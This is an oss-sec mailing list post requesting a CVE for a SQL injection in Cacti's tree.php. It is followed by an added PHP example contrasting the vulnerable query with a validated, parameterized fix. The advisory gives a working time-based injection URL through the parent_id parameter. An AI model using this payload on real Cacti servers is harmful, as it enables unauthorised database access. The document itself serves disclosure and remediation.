oss-sec mailing list archives
please assign CVE for cacti bug 2667: SQL Injection Vulnerability
From: Paul Gevers <elbrus () debian org>
Date: Thu, 10 Mar 2016 17:06:32 +0100
Hi

I just found the description below about an sql vulnerability in the
cacti bug tracker:
http://bugs.cacti.net/view.php?id=2667

Can a CVE be assigned for this issue?

Thanks

==========================
Advisory: Cacti SQL Injection Vulnerability
Author: Do9gy of Tencent Security Platform Department
Affected Version: 0.8.8.g(the latest version & the older versions)
==========================
Vulnerability Description
==========================
Recently, I found a SQL Injection Vulnerability in 'Cacti-0.8.8g' program, Cacti is widely used in many companies.

Vulnerable file:
/cacti/tree.php: line 208:
==========================================================================================================================================
switch ($current_type) {
case TREE_ITEM_TYPE_HEADER:
    $i = 0;

    /* it's nice to default to the parent sorting style for new items */
    if (empty($_GET["id"])) {
        $default_sorting_type = db_fetch_cell("select sort_children_type from graph_tree_items where id=" . $_GET["parent_id"]);
    }else{
        $default_sorting_type = TREE_ORDERING_NONE;
    }
==========================================================================================================================================
The parameter parent_id is used without any validation.

==========================
POC && EXP
==========================
1. Login
2. http://target/cacti-0.8.8g/tree.php?action=item_edit&tree_id=2&parent_id=8%20and%20sleep(1)
3. mysql log: select sort_children_type from graph_tree_items where id=8 and sleep(1)
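
The query pattern from the advisory next to a validated, parameterized form, as an added example that is not part of the original message and is not Cacti's code or its fix. The function names, the in-memory SQLite database (PDO with pdo_sqlite) and its sample row are assumptions made for illustration; only the table and column names come from the advisory.

```php
<?php
// Added example, not Cacti code. Table and column names are taken from the
// advisory; the in-memory SQLite database and its row are constructed data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE graph_tree_items (id INTEGER PRIMARY KEY, sort_children_type INTEGER)');
$db->exec('INSERT INTO graph_tree_items (id, sort_children_type) VALUES (8, 2)');

/* Pattern from the advisory: the request value becomes part of the SQL text.
   Hypothetical helper; it only builds the string so the result can be inspected. */
function build_query_concatenated($parent_id) {
    return 'select sort_children_type from graph_tree_items where id=' . $parent_id;
}

/* Hardened form (hypothetical helper): accept only a positive decimal integer,
   then bind it as a typed parameter so it can never alter the statement. */
function fetch_sort_type(PDO $db, $parent_id) {
    $id = filter_var($parent_id, FILTER_VALIDATE_INT,
                     array('options' => array('min_range' => 1)));
    if ($id === false) {
        throw new InvalidArgumentException('parent_id must be a positive integer');
    }
    $stmt = $db->prepare('SELECT sort_children_type FROM graph_tree_items WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $value = $stmt->fetchColumn();
    return $value === false ? null : (int) $value;
}

// Constructed inputs: a normal id, and the parent_id value from the advisory.
foreach (array('8', '8 and sleep(1)') as $input) {
    echo 'input:        ', var_export($input, true), "\n";
    echo 'concatenated: ', build_query_concatenated($input), "\n";
    try {
        echo 'hardened:     ', var_export(fetch_sort_type($db, $input), true), "\n\n";
    } catch (InvalidArgumentException $e) {
        echo 'hardened:     rejected (', $e->getMessage(), ")\n\n";
    }
}
```

For the second input, the concatenated string matches the statement shown in the advisory's mysql log, while the hardened function rejects the value before any statement is prepared.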